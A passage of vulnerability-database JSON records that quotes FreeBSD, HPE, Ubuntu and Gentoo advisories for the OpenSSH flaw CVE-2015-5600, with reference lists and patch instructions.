"trust": 0.3,
"url": "/archive/1/298274"
},
{
"trust": 0.3,
"url": "/archive/1/298288"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6144.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6091.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6149.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6156.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6153.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6060.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6078.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6098.php"
},
{
"trust": 0.1,
"url": "https://www.iss.net"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6103.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6130.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6109.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6073.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6061.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6064.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6043.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6069.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6114.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6097.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6145.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6099.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6151.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6132.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6148.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6070.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6118.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6115.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6062.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6092.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6105.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6046.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6157.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6076.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6111.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6143.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6045.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6104.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6124.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6116.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6077.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6152.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6079.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6084.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6133.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6160.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6080.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6044.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6089.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6162.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6137.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6112.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6147.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6090.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6117.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6094.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6056.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6110.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/alerts/vol-6_num-4.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6074.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6155.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6058.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6102.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6121.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6139.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6146.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6081.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6095.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6071.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6159.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6134.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6100.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/maillists/index.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6101.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6096.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6066.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6113.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6093.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6065.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6087.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6068.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/sensitive.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6072.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6158.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6142.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6067.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6161.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6136.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6075.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6131.php"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/static/6163.php"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#651994"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
},
{
"db": "PACKETSTORM",
"id": "24431"
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#651994"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
},
{
"db": "BID",
"id": "2405"
},
{
"db": "PACKETSTORM",
"id": "24431"
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#161576"
},
{
"date": "2002-06-27T00:00:00",
"db": "CERT/CC",
"id": "VU#290140"
},
{
"date": "2001-11-07T00:00:00",
"db": "CERT/CC",
"id": "VU#13877"
},
{
"date": "2000-09-26T00:00:00",
"db": "CERT/CC",
"id": "VU#25309"
},
{
"date": "2001-10-24T00:00:00",
"db": "CERT/CC",
"id": "VU#945216"
},
{
"date": "2001-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#566640"
},
{
"date": "2001-05-16T00:00:00",
"db": "CERT/CC",
"id": "VU#651994"
},
{
"date": "2001-01-18T00:00:00",
"db": "CERT/CC",
"id": "VU#315308"
},
{
"date": "2001-02-08T00:00:00",
"db": "BID",
"id": "2347"
},
{
"date": "2001-02-06T00:00:00",
"db": "BID",
"id": "2344"
},
{
"date": "2002-06-27T00:00:00",
"db": "BID",
"id": "5114"
},
{
"date": "2001-02-20T00:00:00",
"db": "BID",
"id": "2405"
},
{
"date": "2001-03-13T23:54:42",
"db": "PACKETSTORM",
"id": "24431"
},
{
"date": "2001-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"date": "2001-06-27T04:00:00",
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#161576"
},
{
"date": "2002-12-12T00:00:00",
"db": "CERT/CC",
"id": "VU#290140"
},
{
"date": "2003-05-20T00:00:00",
"db": "CERT/CC",
"id": "VU#13877"
},
{
"date": "2002-03-05T00:00:00",
"db": "CERT/CC",
"id": "VU#25309"
},
{
"date": "2003-05-20T00:00:00",
"db": "CERT/CC",
"id": "VU#945216"
},
{
"date": "2002-01-15T00:00:00",
"db": "CERT/CC",
"id": "VU#566640"
},
{
"date": "2001-06-26T00:00:00",
"db": "CERT/CC",
"id": "VU#651994"
},
{
"date": "2002-03-05T00:00:00",
"db": "CERT/CC",
"id": "VU#315308"
},
{
"date": "2001-02-08T00:00:00",
"db": "BID",
"id": "2347"
},
{
"date": "2001-02-06T00:00:00",
"db": "BID",
"id": "2344"
},
{
"date": "2002-06-27T00:00:00",
"db": "BID",
"id": "5114"
},
{
"date": "2001-02-20T00:00:00",
"db": "BID",
"id": "2405"
},
{
"date": "2006-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"date": "2018-05-03T01:29:11.913000",
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain implementations of SSH1 may reveal internal cryptologic state",
"sources": [
{
"db": "CERT/CC",
"id": "VU#161576"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "5114"
},
{
"db": "BID",
"id": "2405"
}
],
"trust": 0.6
}
}
VAR-201508-0620
Vulnerability from variot - Updated: 2024-07-22 22:56The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option, as demonstrated by a modified client that provides a different password for each pam element on this list. Openssh of sshd of auth2-chall.c Inside kbdint_next_device The function is a keyboard interaction within a single connection (keyboard-interactive) The brute force is not adequately restricted for device processing. (brute-force) Attacks or service disruption (CPU Resource consumption ) There are vulnerabilities that are put into a state.By a third party ssh of -oKbdInteractiveDevices Brute force through an overly long and redundant list of options (brute-force) Attacks or service disruption (CPU Resource consumption ) There is a possibility of being put into a state. OpenSSH is prone to a security-bypass weakness. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. These vulnerabilities include:
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information. The following firmware versions of Virtual Connect (VC) are impacted:
HPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45 HPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21
Note: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800, CVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and CVE-2016-2842. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-15:16.openssh Security Advisory The FreeBSD Project
Topic: OpenSSH multiple vulnerabilities
Category: contrib Module: openssh Announced: 2015-07-28, revised on 2015-07-30 Affects: All supported versions of FreeBSD. Corrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE) 2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2) 2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1) 2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16) 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE) 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21) 2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE) 2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36) CVE Name: CVE-2014-2653, CVE-2015-5600
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .
- Revision history
v1.0 2015-02-25 Initial release. v1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when keyboard interactive authentication is used.
I. Background
OpenSSH is an implementation of the SSH protocol suite, providing an encrypted and authenticated transport for a variety of services, including remote shell access.
The security of the SSH connection relies on the server authenticating itself to the client as well as the user authenticating itself to the server. SSH servers uses host keys to verify their identity.
RFC 4255 has defined a method of verifying SSH host keys using Domain Name System Security (DNSSEC), by publishing the key fingerprint using DNS with "SSHFP" resource record. RFC 6187 has defined methods to use a signature by a trusted certification authority to bind a given public key to a given digital identity with X.509v3 certificates.
The PAM (Pluggable Authentication Modules) library provides a flexible framework for user authentication and session setup / teardown.
OpenSSH uses PAM for password authentication by default.
II. Problem Description
OpenSSH clients does not correctly verify DNS SSHFP records when a server offers a certificate. [CVE-2014-2653]
OpenSSH servers which are configured to allow password authentication using PAM (default) would allow many password attempts.
III. Impact
A malicious server may be able to force a connecting client to skip DNS SSHFP record check and require the user to perform manual host verification of the host key fingerprint. This could allow man-in-the-middle attack if the user does not carefully check the fingerprint. [CVE-2014-2653]
A remote attacker may effectively bypass MaxAuthTries settings, which would enable them to brute force passwords. [CVE-2015-5600]
IV. Workaround
Systems that do not use OpenSSH are not affected.
There is no workaround for CVE-2014-2653, but the problem only affects networks where DNSsec and SSHFP is properly configured. Users who uses SSH should always check server host key fingerprints carefully when prompted.
System administrators can set:
UsePAM no
In their /etc/ssh/sshd_config and restart sshd service to workaround the problem described as CVE-2015-5600 at expense of losing features provided by the PAM framework.
We recommend system administrators to disable password based authentication completely, and use key based authentication exclusively in their SSH server configuration, when possible. This would eliminate the possibility of being ever exposed to password brute force attack.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
SSH service has to be restarted after the update. A reboot is recommended but not required.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
SSH service has to be restarted after the update. A reboot is recommended but not required.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 9.3, 10.1, 10.2]
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch.asc
gpg --verify openssh.patch.asc
[FreeBSD 8.4]
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch.asc
gpg --verify openssh-8.patch.asc
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patc
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patch.asc
gpg --verify openssh-8-errata.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as described in .
Restart the SSH service, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r286067 releng/8.4/ r286068 stable/9/ r285977 releng/9.3/ r285980 stable/10/ r285976 releng/10.1/ r285979 releng/10.2/ r285978
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.6 (FreeBSD)
iQIcBAEBCgAGBQJVufuCAAoJEO1n7NZdz2rnHHAQALfjXH/WyrgpHxw1YFipwFSD bl+HLbdvMVbfBxLV7eVBK9RPQiyoxwocmU0uMdiNEIWt2llczTLEl/wtUjj6f4Ko K6E7AAOgOX4zdQxBd2502FvXC1oNbDEvK8X3M4MzPHAG4QRgXNffRGYvClmbayck 2i+bjcHdKAEwFJjHk4wXOQ0yhdF6Q36bH0N3kPV9z7sAt3tuzSWhvtX6QQSyeuCJ ie2db9CdSUnFhYELJnVMpVTf3ppMqUT6QEe45LmsGA6F8yWdMaW2vtMdJq6xFVYP INCUVyOlDRu0TibjLUpXu4KugeDgyTXy9oz4SRdnpcUWz33fM6aSgOkpiM1h05ja BJrs0HZbkjCwtD+8a0buoyIKb9NBIsDKbrec5g8AEDkAHjRzraLGAXUYwkFeyqYJ j+ll5r5iu5fc4s8QM+ySlGCW8V9Ix8FX7Rr7FhAWLSKEldDsnCRjG4EfrAcd1HiC PleAnLv4uKwfSugIBIEs5ls7+TzWytW8nnEpMEerXUD894suFIycOT6eoUYF/CCT I1nHWSITw4HSj8+wBvrhxwZCRqIMOAZB+3jzrwRE+QZkghoWnPnqrCn9uLkdndq5 ewgz6PiuYC8Zx0Z6trA72oV+XjTKu2d6eO5tRpe9aAmhPmfBWg3fXYltVzTzF9IE r0z98qmTEPiTDi8dr+K/ =GsXJ -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c05128992
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05128992 Version: 1
HPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service (DoS), Access Restriction Bypass
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-05-11 Last Updated: 2016-05-11
Potential Security Impact: Remote Access Restriction Bypass, Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY A vulnerability in OpenSSH has been addressed by HPE 3PAR OS. The vulnerabily could be exploited remotely resulting in Denial of Service (DoS) or access restriction bypass.
References:
- CVE-2015-5600
- PSRT110106
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE 3PAR OS versions 3.1.3 and later, prior to 3.2.1 MU5 and 3.2.2 MU2 running OpenSSH
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE has provided the following software updates and mitigation information to resolve the vulnerability in 3PAR OS running OpenSSH.
-
3PAR OS 3.2.1 MU5 and 3.2.2 MU2
- HPE recommends prior impacted versions update to 3PAR OS 3.2.1 MU5 or 3.2.2 MU2.
-
3PAR OS 3.1.3 is also vulnerable but will not be fixed.
Mitigation: The best protection to guard against exploitation of this vulnerability is to securely configure and operate the storage array in accordance with the HPE 3PAR Configuration Guidelines documentation. Please contact HPE Technical Support for assistance.
HISTORY Version:1 (rev.1) - 11 May 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. ============================================================================ Ubuntu Security Notice USN-2710-2 August 18, 2015
openssh regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-2710-1 introduced a regression in OpenSSH. The upstream fix for CVE-2015-5600 caused a regression resulting in random authentication failures in non-default configurations. This update fixes the problem.
Original advisory details:
Moritz Jodeit discovered that OpenSSH incorrectly handled usernames when using PAM authentication. If an additional vulnerability were discovered in the OpenSSH unprivileged child process, this issue could allow a remote attacker to perform user impersonation. (CVE number pending) Moritz Jodeit discovered that OpenSSH incorrectly handled context memory when using PAM authentication. If an additional vulnerability were discovered in the OpenSSH unprivileged child process, this issue could allow a remote attacker to bypass authentication or possibly execute arbitrary code. (CVE number pending) Jann Horn discovered that OpenSSH incorrectly handled time windows for X connections. (CVE-2015-5352) It was discovered that OpenSSH incorrectly handled keyboard-interactive authentication. (CVE-2015-5600)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: openssh-server 1:6.7p1-5ubuntu1.3
Ubuntu 14.04 LTS: openssh-server 1:6.6p1-2ubuntu2.3
Ubuntu 12.04 LTS: openssh-server 1:5.9p1-5ubuntu1.7
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2710-2 http://www.ubuntu.com/usn/usn-2710-1 https://launchpad.net/bugs/1485719
Package Information: https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3 https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3 https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7 . VCX prior to 9.8.18 with OpenSSH or ISC BIND.
-
VCX 9.8.18 for the following Products/SKUs:
-
J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
HISTORY Version:1 (rev.1) - 28 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201512-04
https://security.gentoo.org/
Severity: Normal Title: OpenSSH: Multiple vulnerabilities Date: December 20, 2015 Bugs: #553724, #555518, #557340 ID: 201512-04
Synopsis
Multiple vulnerabilities have been found in OpenSSH, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p1-r2 >= 7.1_p1-r2
Description
Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details.
Impact
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-6.9_p1-r2"
References
[ 1 ] CVE-2015-5352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352 [ 2 ] CVE-2015-5600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600 [ 3 ] CVE-2015-6563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563 [ 4 ] CVE-2015-6564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564 [ 5 ] CVE-2015-6565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201512-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201508-0620",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "openssh",
"scope": "lte",
"trust": 1.8,
"vendor": "openbsd",
"version": "6.9"
},
{
"model": "integrated lights out manager",
